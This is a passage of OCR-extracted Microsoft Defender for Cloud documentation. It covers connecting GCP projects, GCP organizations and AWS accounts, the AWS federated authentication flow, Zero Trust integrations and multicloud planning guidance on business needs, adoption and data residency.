Organization details 


In the first section, you need to add the basic properties of the connection between your 
GCP project and Defender for Cloud. 


Home > Microsoft Defender for Cloud | Environment settings > 


Create GCP connector 


Google cloud 


@Project details 


The first step to onboarding your GCP project is to enter a descriptive name for the cloud connector and choose whether to connect 
one project or the whole organization. 


Connector name * | SampleName EA | 

Onboard * © O Organization @) Single project 

Subscription * © Playground Vv 

~~ Resource group * © labs Vv 
Create new 

Location * | East US Vv 

GCP project number * | 0000001 

GCP project Id * | 0000000001 E 


Here you name your connector, select a subscription and resource group, which is used 
to create an ARM template resource that is called security connector. The security 
connector represents a configuration resource that holds the projects settings. 


You can also select a location and add the organization ID for your project. 


Select plans 


After entering your organization's details, you'll then be able to select which plans to 


enable. 


Gerni D Select plans 
Select plans 


^ Cloud Security Posture Management (CSPM) 


From here, you can decide which resources you want to protect based on the security 


value you want to receive. 


Configure access 


Once you've selected the plans, you want to enable and the resources you want to 
protect you have to configure access between Defender for Cloud and your GCP project. 


Home > Microsoft Defender for Cloud | Environment settings 


Create GCP connector 


Google cloud 


@OProject details © Select plans D Configure access 


[À Copy script to GCP Cloud Shell 


A Cloud Shell template to configure access on GCP side has been created according to the plans selected in the previous tab. 


> 


D Copy 
GCP Cloud Shell > 


d Edit service account email address or identity provider 


We have auto-filled the service account email address/es and identity provider/s created on GCP side according to the plan/s you 
selected. If you have not changed the names in GCP side, click "Review and generate’. In case you did change the names, please 
update them below: 


Identity federation pool name * 


microsoft defender for cloud 


< 


Cloud Security Posture Management 


< 


Servers 


\ Databases Ge 


\ Containers 


In this step, you can find the GCloud script that needs to be run on the GCP project that 
is going to onboarded. The GCloud script is generated based on the plans you selected 
to onboard. 


The GCloud script creates all of the required resources on your GCP environment so that 
Defender for Cloud can operate and provide the following security values: 


e Workload identity pool 
e Workload identity provider (per plan) 
e Service accounts 


e Project level policy bindings (service account has access only to the specific 
project) 


Review and generate 


The final step for onboarding is to review all of your selections and to create the 


connector. 


Home > Microsoft Defender for Cloud | Environment settings > 


Create GCP connector 


Google cloud 


@Project details © Select plans © Configure access D Review and generate 


Account details 


Display name SampleName 
Subscription Playground 
Resource Group labs 

Region East US 
Organization id 0000001 
Management project id 0000000001 


Identity federation pool id 


Management project id 


Selected plans 


Cloud Security Posture Management 
Defender CSPM 

Servers 

Databases 


Containers 


Configure access 


CSPM service account email microsoft-defender-cspm@0000000001.iam.gserviceaccount.com 
CSPM identity provider id cspm 

Servers service account email microsoft-defender-for-servers@0000000001.iam.gserviceaccount.com 
Servers Identity provider defender-for-servers 


Databases ARC auto provisioning service microsoft-databases-arc-ap@0000000001.iam.gserviceaccount.com 
account email 


Databases ARC auto provisioning Identity defender-for-databases-arc-ap 
provider 


Containers service account email 


Containers identity provider id containers 
Containers data collection service 

account email 

Containers data collection identity containers-streams 
provider id 


What happens when you onboard an 
organization 


Similar to onboarding a single project, When onboarding a GCP organization, Defender 
for Cloud creates a security connector for each project under the organization (unless 
specific projects were excluded). 


Organization details 


In the first section, you need to add the basic properties of the connection between your 
GCP organization and Defender for Cloud. 


Home > Microsoft Defender for Cloud | Environment settings > 


Create GCP connector 


Google cloud 


Q@organization details 


The first step to onboarding your GCP project is to enter a descriptive name for the cloud connector and choose whether to connect 
one project or the whole organization. 


Connector name * | SampleName v | 

Onboard * © GO Organization O Single project 

Subscription * © Playground Vv 
Resource group * © | labs v 

Create new 

Location * ‘East US | Vv 

Organization id * 0000001 v 

Excluded project numbers 00000001 maa 

Excluded folder ids @ 000000000001 Ú 


Here you name your connector, select a subscription and resource group that is used to 
create an ARM template resource that is called security connector. The security 
connector represents a configuration resource that holds the projects settings. 


You also select a location and add the organization ID for your project. 


When you onboard an organization, you can also choose to exclude project numbers 
and folder IDs. 


Select plans 


After entering your organization's details, you'll then be able to select which plans to 
enable. 


= Microsoft azure (Preview) 


Homi 


licrosoft Defender for Cloud | Environment settings 


g Settings | Defender plans 
i ing project 
Green details D select plans 


Select plans 


From here, you can decide which resources you want to protect based on the security 


value you want to receive. 


Configure access 


Once you've selected the plans, you want to enable and the resources you want to 
protect you have to configure access between Defender for Cloud and your GCP project. 


Home > Microsoft Defender for Cloud | Environment settings 


Create GCP connector 


Google cloud 


Q@organization details iv} Select plans © Configure access 


D Copy script to GCP Cloud Shell 
A Cloud Shell template to configure access on GCP side has been created according to the plans selected in the previous tab. 
By running the template, we'll create a management project and organization custom role to onboard the organization and enable future projects’ onboarding auto-provisioning. 


# Setting = Environment Variables d 


D Copy 


GCP Cloud Shell > 


2 Management project details 


Please provide the management project details (the gcloud script output) to continue 
E Create a dedicated billable GCP project automatically (as part of the gcloud script) © 


Project number * © 


Copy after running the gcloud script 


Project id * © 
mdc-mgmt-proj-0000001 


Identity federation pool name * 
microsoft defender for cloud 


Service account email address * 


Identity provider * 


auto-provisioner 


2 Edit service account email address or identity provider 
v Cloud Security Posture Management 


vV Servers 


v Databases Q 


v Containers 


When you onboard an organization, there's a section that includes management project 
details. Similar to other GCP projects, the organization is also considered a project and is 
utilized by Defender for Cloud to create all of the required resources needed to connect 
the organization to Defender for Cloud. 


In the management project details section, you have the choice of: 


e Dedicating a management project for Defender for Cloud to include in the GCloud 
script. 

e Provide the details of an already existing project to be used as the management 
project with Defender for Cloud. 


You need to decide what is your best option for your organization's architecture. We 
recommend creating a dedicated project for Defender for Cloud. 


The GCloud script is generated based on the plans you selected to onboard. The script 
creates all of the required resources on your GCP environment so that Defender for 
Cloud can operate and provide the following security benefits: 


e Workload identity pool 

e Workload identity provider for each plan 

e Custom role to grant Defender for Cloud access to discover and get the project 
under the onboarded organization 

e A service account for each plan 

e A service account for the autoprovisioning service 

e Organization level policy bindings for each service account 

e API enablement(s) at the management project level. 


Some of the APIs aren't in direct use with the management project. Instead the APIs 
authenticate through this project and use one of the API(s) from another project. The 
API must be enabled on the management project. 


Review and generate 


The final step for onboarding is to review all of your selections and to create the 
connector. 


Home > Microsoft Defender for Cloud | Environment settings > 


Create GCP connector 
Google cloud 


Qorganization details © Select plans © Configure access D Review and generate 


Account details 

Display name SampleName 

Subscription Playground 

Resource Group labs 

Region East US 

Organization id 0000001 

Management project id mdc-mgmt-proj-0000001 

Identity federation pool id 

Management project id 000000000001 

Selected plans 

Cloud Security Posture Management 

Defender CSPM 

Servers 

Databases 

Containers 

Configure 

CSPM service account email microsoft-defender-cspm@mdc-mgmt-proj-0000001.iam.gserviceaccount.com 
CSPM identity provider id cspm 

Servers service account email microsoft-defender-for-servers@mdc-mgmt-proj-0000001.iam.gserviceaccount.com 
Servers Identity provider defender-for-servers 


Databases ARC auto provisioning service microsoft-databases-arc-ap@mdc-mgmt-proj-0000001.iam.gserviceaccount.com 
account email 
Databases ARC auto provisioning Identity defender-for-databases-arc-ap 


provider 

Containers service account email microsoft-defender-containers@mdc-mgmt-proj-0000001.iam.gserviceaccount.com 
Containers identity provider id containers 

Containers data collection service ms-defender-containers-stream@mdc-mgmt-proj-0000001.iam.gserviceaccount.com 
account email 

Containers data collection identity containers-streams 


provider id 
Service account unique numeric ID 


Next steps 


Connect your GCP projects to Microsoft Defender for Cloud 


Defender for Cloud's AWS connector 


Article e 10/11/2023 


To protect your AWS-based resources, you must connect your AWS account using the 
built-in connector. The connector provides an agentless connection to your AWS 
account that you can extend with Defender for Cloud's Defender plans to secure your 
AWS resources: 


e Cloud Security Posture Management (CSPM) assesses your AWS resources 
according to AWS-specific security recommendations and reflects your security 
posture in your secure score. The asset inventory gives you one place to see all of 
your protected AWS resources. The regulatory compliance dashboard shows your 
compliance with built-in standards specific to AWS, including AWS CIS, AWS PCI 
DSS, and AWS Foundational Security Best Practices. 


e Microsoft Defender for Servers brings threat detection and advanced defenses to 
supported Windows and Linux EC2 instances. 


e Microsoft Defender for Containers brings threat detection and advanced defenses 
to supported Amazon EKS clusters. 


e Microsoft Defender for SQL brings threat detection and advanced defenses to 
your SQL Servers running on AWS EC2, AWS RDS Custom for SQL Server. 


The retired Classic cloud connector - Requires you to configure your AWS account to 
create a user that Defender for Cloud can use to connect to your AWS environment. The 
classic connector is only available to customers who have previously connected AWS 
accounts with it. 


© Note 


If you are connecting an AWS account that was previously connected with the 
classic connector, you must remove them first. Using an AWS account that is 
connected by both the classic and native connectors can produce duplicate 


recommendations. 


AWS authentication process 


Federated authentication is used between Microsoft Defender for Cloud and AWS. All of 
the resources related to the authentication are created as a part of the CloudFormation 


template deployment, including: 


e An identity provider (OpenID connect) 
e Identity and Access Management (IAM) roles with a federated principal (connected 
to the identity providers). 


The architecture of the authentication process across clouds is as follows: 


fay AWS Cloud 
LEN Azure Cloud 
A Role 
Microsoft Defender for 
2 Cloud (MDC) Identity & Acsess Managment (IAM) 

AWS STS 

4 Azure Active Directory 

“WZ (Azure AD) 
SS Temporary security credential 


1. Microsoft Defender for Cloud CSPM service acquires a Microsoft Entra token with a 
validity life time of 1 hour that is signed by the Microsoft Entra ID using the RS256 
algorithm. 


2. The Microsoft Entra token is exchanged with AWS short living credentials and 
Defender for Cloud's CSPM service assumes the CSPM IAM role (assumed with 
web identity). 


3. Since the principle of the role is a federated identity as defined in a trust 
relationship policy, the AWS identity provider validates the Microsoft Entra token 
against the Microsoft Entra ID through a process that includes: 


e audience validation 
e signing of the token 
e certificate thumbprint 


4. The Microsoft Defender for Cloud CSPM role is assumed only after the validation 
conditions defined at the trust relationship have been met. The conditions defined 
for the role level are used for validation within AWS and allows only the Microsoft 
Defender for Cloud CSPM application (validated audience) access to the specific 
role (and not any other Microsoft token). 


5. After the Microsoft Entra token validated by the AWS identity provider, the AWS 
STS exchanges the token with AWS short-living credentials which CSPM service 
uses to scan the AWS account. 


Native connector plan requirements 


Each plan has its own requirements for the native connector. 


Defender for Containers plan 


e At least one Amazon EKS cluster with permission to access to the EKS K8s API 
server. If you need to create a new EKS cluster, follow the instructions in Getting 
started with Amazon EKS - eksctl £. 


e The resource capacity to create a new SQS queue, Kinesis Fire Hose delivery 
stream, and S3 bucket in the cluster's region. 


Defender for SQL plan 


e Microsoft Defender for SQL enabled on your subscription. Learn how to enable 
protection on all of your databases. 


e An active AWS account, with EC2 instances running SQL server or RDS Custom for 
SQL Server. 


e Azure Arc for servers installed on your EC2 instances/RDS Custom for SQL Server. 


o (Recommended) Use the auto provisioning process to install Azure Arc on all of 
your existing and future EC2 instances. 


Auto provisioning managed by AWS Systems Manager (SSM) using the SSM 
agent. Some Amazon Machine Images (AMIs) already have the SSM agent 
preinstalled. If you already have the SSM agent preinstalled, the AMIs are listed 
in AMIs with SSM Agent preinstalled Z . If your EC2 instances don't have the 
SSM Agent, you need to install it using either of the following relevant 
instructions from Amazon: 

o Install SSM Agent for a hybrid environment (Windows) E 


O Note 


To enable the Azure Arc auto-provisioning, you'll need Owner permission 
on the relevant Azure subscription. 
e Other extensions should be enabled on the Arc-connected machines: 
o Microsoft Defender for Endpoint 
o VA solution (TVM/Qualys) 
o Log Analytics (LA) agent on Arc machines or Azure Monitor agent (AMA) 


Make sure the selected LA workspace has security solution installed. The LA 
agent and AMA are currently configured in the subscription level. All of your 
AWS accounts and GCP projects under the same subscription inherit the 
subscription settings for the LA agent and AMA. 


Learn more about monitoring components for Defender for Cloud. 


Defender for Servers plan 


e Microsoft Defender for Servers enabled on your subscription. Learn how to enable 
plans. 


e An active AWS account, with EC2 instances. 
e Azure Arc for servers installed on your EC2 instances. 


o (Recommended) Use the auto provisioning process to install Azure Arc on all of 
your existing and future EC2 instances. 


Auto provisioning managed by AWS Systems Manager (SSM) using the SSM 
agent. Some Amazon Machine Images (AMIs) already have the SSM agent 
preinstalled. If that is the case, their AMIs are listed in AMIs with SSM Agent 
preinstalled £ . If your EC2 instances don't have the SSM Agent, you need to 
install it using either of the following relevant instructions from Amazon: 


o Install SSM Agent for a hybrid environment (Windows) E 


o Install SSM Agent for a hybrid environment (Linux) E 


O Note 


To enable the Azure Arc auto-provisioning, you'll need an Owner 
permission on the relevant Azure subscription. 


o If you want to manually install Azure Arc on your existing and future EC2 
instances, use the EC2 instances should be connected to Azure ATZE 
recommendation to identify instances that don't have Azure Arc installed. 


e Other extensions should be enabled on the Arc-connected machines: 
o Microsoft Defender for Endpoint 
o VA solution (TVM/Qualys) 
o Log Analytics (LA) agent on Arc machines or Azure Monitor agent (AMA) 


Make sure the selected LA workspace has security solution installed. The LA 
agent and AMA are currently configured in the subscription level. All of your 
AWS accounts and GCP projects under the same subscription inherit the 
subscription settings for the LA agent and AMA. 


Learn more about monitoring components for Defender for Cloud. 


O Note 


Defender for Servers assigns tags to your AWS resources to manage the 
auto-provisioning process. You must have these tags properly assigned to 
your resources so that Defender for Cloud can manage your resources: 
Accountld, Cloud, Instanceld, MDFCSecurityConnector 


Learn more 


You can check out the following blogs: 


e Ignite 2021: Microsoft Defender for Cloud news E, 
e Security posture management and server protection for AWS and GCP Z 


Next steps 


Connecting your AWS account is part of the multicloud experience available in Microsoft 
Defender for Cloud. 


e Protect all of your resources with Defender for Cloud 


Zero Trust infrastructure and 
integrations 


Article e 03/15/2023 


Zero Trust is a security strategy for designing and implementing the following sets of 
security principles: 


Verify explicitly | Use least privilege access Assume breach 

Always Limit user access with Just-In- Minimize blast radius and segment 
authenticate and Time and Just-Enough-Access access. Verify end-to-end encryption and 
authorize based VIT/JEA), risk-based adaptive use analytics to get visibility, drive threat 
on all available policies, and data protection. detection, and improve defenses. 

data points. 


Infrastructure comprises the hardware, software, micro-services, networking 
infrastructure, and facilities required to support IT services for an organization. Zero 
Trust infrastructure solutions assess, monitor, and prevent security threats to these 


services. 


Zero Trust infrastructure solutions support the principles of Zero Trust by ensuring that 

access to infrastructure resources is verified explicitly, access is granted using principles 
of least privilege access, and mechanisms are in place that assumes breach and look for 
and remediate security threats in infrastructure. 


This guidance is for software providers and technology partners who want to enhance 
their infrastructure security solutions by integrating with Microsoft products. 


Zero Trust integration for Infrastructure guide 


This integration guide includes strategy and instructions for integrating with Microsoft 
Defender for Cloud and its integrated cloud workload protection platform (CWPP), 
Microsoft Defender for Cloud. 


The guidance includes integrations with the most popular Security Information and 
Event Management (SIEM), Security Orchestration Automated Response (SOAR), 
Endpoint Detection and Response (EDR), and IT Service Management (ITSM) solutions. 


Zero Trust and Defender for Cloud 


Our Zero Trust infrastructure deployment guidance provides key stages of the Zero Trust 


strategy for infrastructure. Which are: 


1. Assess compliance with chosen standards and policies 


2. Harden configuration wherever gaps are found 


3. Employ other hardening tools such as just-in-time (JIT) VM access 


4. Set up threat detection and protections 


5. Automatically block and flag risky behavior and take protective actions 


There's a clear mapping from the goals we've described in the infrastructure 


deployment guidance to the core aspects of Defender for Cloud. 


Zero Trust 
goal 


Assess 
compliance 


Harden 
configuration 


Employ 
hardening 
mechanisms 


Set up threat 
detection 


Automatically 
block 
suspicious 
behavior 


Automatically 
flag 
suspicious 
behavior 


Defender for Cloud feature 


In Defender for Cloud, every subscription automatically has the Microsoft cloud 
security benchmark (MCSB) security initiative assigned. 

Using the secure score tools and the regulatory compliance dashboard you can 
get a deep understanding of your customer's security posture. 


Review your security recommendations and track your secure score improvement 
overtime. You can also prioritize which recommendations to remediate based on 
potential attack paths, by leveraging the attack path feature. 


Least privilege access is one of the three principles of Zero Trust. Defender for 
Cloud can assist you to harden VMs and network using this principle by 
leveraging features such as: 

Just-in-time (JIT) virtual machine (VM) access 

Adaptive network hardening 

Adaptive application controls. 


Defender for Cloud offers an integrated cloud workload protection platform 
(CWPP), Microsoft Defender for Cloud. 

Microsoft Defender for Cloud provides advanced, intelligent, protection of Azure 
and hybrid resources and workloads. 

One of the Microsoft Defender plans, Microsoft Defender for servers, includes a 
native integration with Microsoft Defender for Endpoint. 

Learn more in Introduction to Microsoft Defender for Cloud. 


Many of the hardening recommendations in Defender for Cloud offer a deny 
option. This feature lets you prevent the creation of resources that don't satisfy 
defined hardening criteria. Learn more in Prevent misconfigurations with 
Enforce/Deny recommendations. 


Microsoft Defenders for Cloud's security alerts are triggered by advanced 
detections. Defender for Cloud prioritizes and lists the alerts, along with the 
information needed for you to quickly investigate the problem. Defender for 
Cloud also provides detailed steps to help you remediate attacks. For a full list of 
the available alerts, see Security alerts - a reference guide. 


Protect your Azure PaaS services with Defender for Cloud 


With Defender for Cloud enabled on your subscription, and Microsoft Defender for 
Cloud enabled for all available resource types, you'll have a layer of intelligent threat 
protection - powered by Microsoft Threat Intelligence Z - protecting resources in Azure 
Key Vault, Azure Storage, Azure DNS, and other Azure PaaS services. For a full list, see 
What resource types can Microsoft Defender for Cloud secure?. 


Azure Logic Apps 


Use Azure Logic Apps to build automated scalable workflows, business processes, and 
enterprise orchestrations to integrate your apps and data across cloud services and on- 
premises systems. 


Defender for Cloud's workflow automation feature lets you automate responses to 
Defender for Cloud triggers. 


This is great way to define and respond in an automated, consistent manner when 
threats are discovered. For example, to notify relevant stakeholders, launch a change 
management process, and apply specific remediation steps when a threat is detected. 


Integrate Defender for Cloud with your SIEM, SOAR, and 
ITSM solutions 


Microsoft Defender for Cloud can stream your security alerts into the most popular 
Security Information and Event Management (SIEM), Security Orchestration Automated 
Response (SOAR), and IT Service Management (ITSM) solutions. 


There are Azure-native tools for ensuring you can view your alert data in all of the most 
popular solutions in use today, including: 


e Microsoft Sentinel 

e Splunk Enterprise and Splunk Cloud 
e IBM's QRadar 

e ServiceNow 

e ArcSight 

e Power BI 

e Palo Alto Networks 


Microsoft Sentinel 


Defender for Cloud natively integrates with Microsoft Sentinel, Microsoft's cloud-native, 
security information event management (SIEM) and security orchestration automated 
response (SOAR) solution. 


There are two approaches to ensuring your Defender for Cloud data is represented in 
Microsoft Sentinel: 


e Sentinel connectors - Microsoft Sentinel includes built-in connectors for Microsoft 
Defender for Cloud at the subscription and tenant levels: 
o Stream alerts to Microsoft Sentinel at the subscription level 
o Connect all subscriptions in your tenant to Microsoft Sentinel Z 


Q Tip 


Learn more in Connect security alerts from Microsoft Defender for Cloud. 


e Stream your audit logs - An alternative way to investigate Defender for Cloud 
alerts in Microsoft Sentinel is to stream your audit logs into Microsoft Sentinel: 
o Connect Windows security events 
o Collect data from Linux-based sources using Syslog 
o Connect data from Azure Activity log 


Stream alerts with Microsoft Graph Security API 


Defender for Cloud has out-of-the-box integration with Microsoft Graph Security API. 
No configuration is required and there are no extra costs. 


You can use this API to stream alerts from the entire tenant (and data from many other 
Microsoft Security products) into third-party SIEMs and other popular platforms: 


e Splunk Enterprise and Splunk Cloud - Use the Microsoft Graph Security API Add- 
On for Splunk £ 

e Power BI - Connect to the Microsoft Graph Security API in Power BI Desktop 

e ServiceNow - Follow the instructions to install and configure the Microsoft Graph 
Security API application from the ServiceNow Store Z 

e QRadar - IBM's Device Support Module for Microsoft Defender for Cloud via 
Microsoft Graph ARIS 

e Palo Alto Networks, Anomali, Lookout, InSpark, and more - Microsoft Graph 
Security ARIS 


Learn more about Microsoft Graph Security API Z. 


Stream alerts with Azure Monitor 


Use Defender for Cloud's continuous export feature to connect Defender for Cloud with 
Azure monitor via Azure Event Hubs and stream alerts into ArcSight, SumoLogic, Syslog 
servers, LogRhythm, Logz.io Cloud Observability Platform, and other monitoring 
solutions. 


Learn more in Stream alerts with Azure Monitor. 


This can also be done at the Management Group level using Azure Policy, see Create 
continuous export automation configurations at scale. 


Q Tip 


To view the event schemas of the exported data types, visit the Event Hub event 
schemas ©. 


Integrate Defender for Cloud with an Endpoint Detection 
and Response (EDR) solution 


Microsoft Defender for Endpoint 
Microsoft Defender for Endpoint is a holistic, cloud-delivered endpoint security solution. 


Defender for Cloud's integrated CWPP for machines, Microsoft Defender for servers, 
includes an integrated license for Microsoft Defender for Endpoint “. Together, they 
provide comprehensive endpoint detection and response (EDR) capabilities. For more 
information, see Protect your endpoints. 


When Defender for Endpoint detects a threat, it triggers an alert. The alert is shown in 
Defender for Cloud. From Defender for Cloud, you can also pivot to the Defender for 
Endpoint console and perform a detailed investigation to uncover the scope of the 
attack. Learn more about Microsoft Defender for Endpoint. 


Other EDR solutions 


Defender for Cloud provides hardening recommendations to ensure you're securing 
your organization's resources according to the guidance of Azure Security Benchmark. 
One of the controls in the benchmark relates to endpoint security: ES-1: Use Endpoint 
Detection and Response (EDR). 


There are two recommendations in Defender for Cloud to ensure you've enabled 
endpoint protection and it's running well. These recommendations are checking for the 
presence and operational health of EDR solutions from: 


e Trend Micro 
e Symantec 
e McAfee 

e Sophos 


Learn more in Endpoint protection assessment and recommendations in Microsoft 
Defender for Cloud. 


Apply your Zero Trust strategy to hybrid and multicloud 
scenarios 


With cloud workloads commonly spanning multiple cloud platforms, cloud security 
services must do the same. 


Microsoft Defender for Cloud protects workloads wherever they're running: in Azure, 
on-premises, Amazon Web Services (AWS), or Google Cloud Platform (GCP). 


Integrate Defender for Cloud with on-premises machines 


To secure hybrid cloud workloads, you can extend Defender for Cloud's protections by 


connecting on-premises machines to Azure Arc enabled servers. 


Learn about how to connect machines in Connect your non-Azure machines to 
Defender for Cloud. 


Integrate Defender for Cloud with other cloud environments 


To view the security posture of Amazon Web Services machines in Defender for Cloud, 
onboard AWS accounts into Defender for Cloud. This integrates AWS Security Hub and 
Microsoft Defender for Cloud for a unified view of Defender for Cloud recommendations 
and AWS Security Hub findings and provides a range of benefits as described in 
Connect your AWS accounts to Microsoft Defender for Cloud. 


To view the security posture of Google Cloud Platform machines in Defender for Cloud, 
onboard GCP accounts into Defender for Cloud. This integrates GCP Security Command 
and Microsoft Defender for Cloud for a unified view of Defender for Cloud 
recommendations and GCP Security Command Center findings and provides a range of 
benefits as described in Connect your GCP accounts to Microsoft Defender for Cloud. 


Next steps 


To learn more about Microsoft Defender for Cloud and Microsoft Defender for Cloud, 
see the complete Defender for Cloud documentation. 


Get started 


Article e 05/10/2023 


This article introduces guidance to help you design a solution for securing and 
protecting your multicloud environment with Microsoft Defender for Cloud. The 
guidance can be used by cloud solution and infrastructure architects, security architects 
and analysts, and anyone else involved in designing a multicloud security solution. 


As you capture your functional and technical requirements, the articles provide an 
overview of multicloud capabilities, planning guidance, and prerequisites. 


Follow the guides in order. They build on each other to help you make design decisions. 
We recommend that you reread the articles as needed, to understand and incorporate 
all considerations. 


What should I get from this guide? 


Use this guide as an aid as you design Cloud Security Posture Management (CSPM) and 
Cloud Workload Protection Plan (CWPP) solutions across multicloud environments. After 
reading the articles you should have answers to the following: 


What questions should | ask and answer as | design my multicloud solution? 


What steps do | need to complete to design a solution? 


What technologies and capabilities are available to me? 
What trade-offs do | need to consider? 


Problem space 


As organizations span multiple cloud providers, it becomes increasingly complex to 
centralize security, and for security teams to work across multiple environments and 
vendors. 


Defender for Cloud helps you to protect your multicloud environment by strengthening 
your security posture and protecting your workloads. Defender for Cloud provides a 
single dashboard to manage protection across all environments. 
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Before you begin 


Before working through these articles, you should have a basic understanding of Azure, 
Defender for Cloud, Azure Arc, and your multicloud AWS/GCP environment. 


Next steps 


In this article, you have been provided an introduction to begin your path to designing a 
multicloud security solution. Continue with the next step to determine business needs. 


Determine business needs 


Article e 05/10/2023 


This article is part of a series to provide guidance as you design a cloud security posture 
management (CSPM) and cloud workload protection platform (CWPP) solution across 


multicloud resources with Microsoft Defender for Cloud. 


Goal 


Identify how Defender for Cloud’s multicloud capabilities can help your organization to 
meet its business goals and protect AWS/GCP resources. 


Get started 


The first step in designing a multicloud security solution is to determine your business 
needs. Every company, even if in the same industry, has different requirements. Best 
practices can provide general guidance, but specific requirements are determined by 
your unique business needs. As you start defining requirements, answer these questions: 


e Does your company need to assess and strengthen the security configuration of its 
cloud resources? 

e Does your company want to manage the security posture of multicloud resources 
from a single point (single pane of glass)? 

e What boundaries do you want to put in place to ensure that your entire 
organization is covered, and no areas are missed? 

e Does your company need to comply with industry and regulatory standards? If so, 
which standards? 

e What are your goals for protecting critical workloads, including containers and 
servers, against malicious attacks? 

e Do you need a solution only in a specific cloud environment, or a cross-cloud 
solution? 

e How will the company respond to alerts and recommendations, and remediate 
non-compliant resources? 

e Will workload owners be expected to remediate issues? 


Mapping Defender for Cloud to business 
requirements 


Defender for Cloud provides a single management point for protecting Azure, on- 


premises, and multicloud resources. Defender for Cloud can meet your business 


requirements by: 


Securing and protecting your GCP, AWS, and Azure environments. 

Assessing and strengthening the security configuration of your cloud workloads. 
Managing compliance against critical industry and regulatory standards. 
Providing vulnerability management solutions for servers and containers. 
Protecting critical workloads, including containers, servers, and databases, against 
malicious attacks. 


The diagram below shows the Defender for Cloud architecture. Defender for Cloud can: 


Provide unified visibility and recommendations across multicloud environments. 
There's no need to switch between different portals to see the status of your 
resources. 

Compare your resource configuration against industry standards, regulations, and 
benchmarks. Learn more about standards. 

Help security analysts to triage alerts based on threats/suspicious activities. 
Workload protection capabilities can be applied to critical workloads for threat 
detection and advanced defenses. 
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Next steps 


In this article, you've learned how to determine your business needs when designing a 


multicloud security solution. Continue with the next step to determine an adoption 


strategy. 


Define an adoption strategy 


Article e 03/30/2023 


This article is part of a series to provide guidance as you design a cloud security posture 
management (CSPM) and cloud workload protection platform (CWPP) solution across 


multicloud resources with Microsoft Defender for Cloud. 


Goal 


Consider your high-level business needs, the resource and process ownership model for 
your organization, and an iteration strategy as you continuously add resources to your 
solution. 


Get started 


Think about your broad requirements: 


e Determine business needs. Keep first steps simple, and then iterate to 
accommodate future change. Decide your goals for a successful adoption, and 
then the metrics you'll use to define success. 


e Determine ownership. Figure out where multicloud capabilities fall under your 
teams. Review the determine ownership requirements and determine access 
control requirements articles to answer these questions: 

o How will your organization use Defender for Cloud as a multicloud solution? 

o What cloud security posture management (CSPM) and cloud workload 
protection (CWP) capabilities do you want to adopt? 

o Which teams will own the different parts of Defender for Cloud? 

o What is your process for responding to security alerts and recommendations? 
Remember to consider Defender for Cloud’s governance feature when making 
decisions about recommendation processes. 

o How will security teams collaborate to prevent friction during remediation? 


e Plan a lifecycle strategy. As new multicloud resources onboard into Defender for 
Cloud, you need a strategic plan in place for that onboarding. Remember that you 
can use auto-provisioning for easier agent deployment. 


Next steps 


In this article, you've learned how to determine your adoption strategy when designing 
a multicloud security solution. Continue with the next step to determine data residency 
requirements. 


Determine data residency requirements 


Article e 08/13/2023 


This article is one of a series providing guidance as you design a cloud security posture 
management (CSPM) and cloud workload protection (CWP) solution across multicloud 
resources with Microsoft Defender for Cloud. 


Goal 


Identify data residency constraints as you plan your multicloud deployment. 


Get started 


When designing business solutions, data residency (the physical or geographic location 
of an organization's data) is often top of mind due to compliance requirements. For 
example, the European Union's General Data Protection Regulation (GDPR) requires all 
data collected on citizens to be stored in the EU, for it to be subject to European privacy 
laws. 


e As you plan, consider these points around data residency: 


e When you create connectors to protect multicloud resources, the connector 
resource is hosted in an Azure resource group that you choose when you set up 
the connector. Select this resource group in accordance with your data residency 
requirements. 

When data is retrieved from AWS/GCP, it's stored in either GDPR-EU, or US: 

o Defender for Cloud looks at the region in which the data is stored in the 
AWS/GCP cloud and matches that. 

o Anything in the EU is stored in the EU region. Anything else is stored in the US 
region. 


Agent considerations 


There are data considerations around agents and extensions used by Defender for 
Cloud. 


e CSPM: CSPM functionality in Defender for Cloud is agentless. No agents are 
needed for CSPM to work. 

e CWP: Some workload protection functionality for Defender for Cloud requires the 
use of agents to collect data. 


Defender for Servers plan 


Agents are used in the Defender for Servers plan as follows: 


e Non-Azure public clouds connect to Azure by leveraging the Azure Arc service. 

e The Azure Connected Machine agent is installed on multicloud machines that 
onboard as Azure Arc machines. Defender for Cloud should be enabled in the 
subscription in which the Azure Arc machines are located. 

e Defender for Cloud leverages the Connected Machine agent to install extensions 
(such as Microsoft Defender for Endpoint) that are needed for Defender for Servers 
functionality. 

e Log analytics agent/Azure Monitor Agent (AMA) is needed for some Defender for 
Service Plan 2 functionality. 

o The agents can be provisioned automatically by Defender for Cloud. 

o When you enable auto-provisioning, you specify where to store collected data. 
Either in the default Log Analytics workspace created by Defender for Cloud, or 
in any other workspace in your subscription. Learn more. 

o If you select to continuously export data, you can drill into and configure the 
types of events and alerts that are saved. Learn more. 

e Log Analytics workspace: 

o You define the Log Analytics workspace you use at the subscription level. It can 
be either a default workspace, or a custom-created workspace. 

o There are several reasons to select the default workspace rather than the 
custom workspace. 

o The location of the default workspace depends on your Azure Arc machine 
region. Learn more. 

o The location of the custom-created workspace is set by your organization. Learn 
more about using a custom workspace. 


Defender for Containers plan 


Defender for Containers protects your multicloud container deployments running in: 


e Azure Kubernetes Service (AKS) - Microsoft's managed service for developing, 
deploying, and managing containerized applications. 

e Amazon Elastic Kubernetes Service (EKS) in a connected AWS account - 
Amazon's managed service for running Kubernetes on AWS without needing to 
install, operate, and maintain your own Kubernetes control plane or nodes. 

e Google Kubernetes Engine (GKE) in a connected GCP project - Google's managed 
environment for deploying, managing, and scaling applications using GCP 
infrastructure. 


e Other Kubernetes distributions - using Azure Arc-enabled Kubernetes, which 
allows you to attach and configure Kubernetes clusters running anywhere, 
including other public clouds and on-premises. 


Defender for Containers has both agent-based and agentless components. 


e Agentless collection of Kubernetes audit log data: Amazon CloudWatch £ or GCP 
Cloud Logging enables and collects audit log data, and sends the collected 
information to Defender for Cloud for further analysis. Data storage is based on 
the EKS cluster AWS region, in accordance with GDPR - EU and US. 

e Agent-based Azure Arc-enabled Kubernetes: Connects your EKS and GKE clusters 
to Azure using Azure Arc agents, so that they're treated as Azure Arc resources. 

e Defender agent: A DaemonSet that collects signals from hosts using eBPF 
technology, and provides runtime protection. The extension is registered with a 
Log Analytics workspace and used as a data pipeline. The audit log data isn't 
stored in the Log Analytics workspace. 

e Azure Policy for Kubernetes: configuration information is collected by Azure Policy 
for Kubernetes. 

o Azure Policy for Kubernetes extends the open-source Gatekeeper v3 admission 
controller webhook for Open Policy Agent. 

o The extension registers as a web hook to Kubernetes admission control and 
makes it possible to apply at-scale enforcement, safeguarding your clusters in a 


centralized, consistent manner. 


Defender for Databases plan 


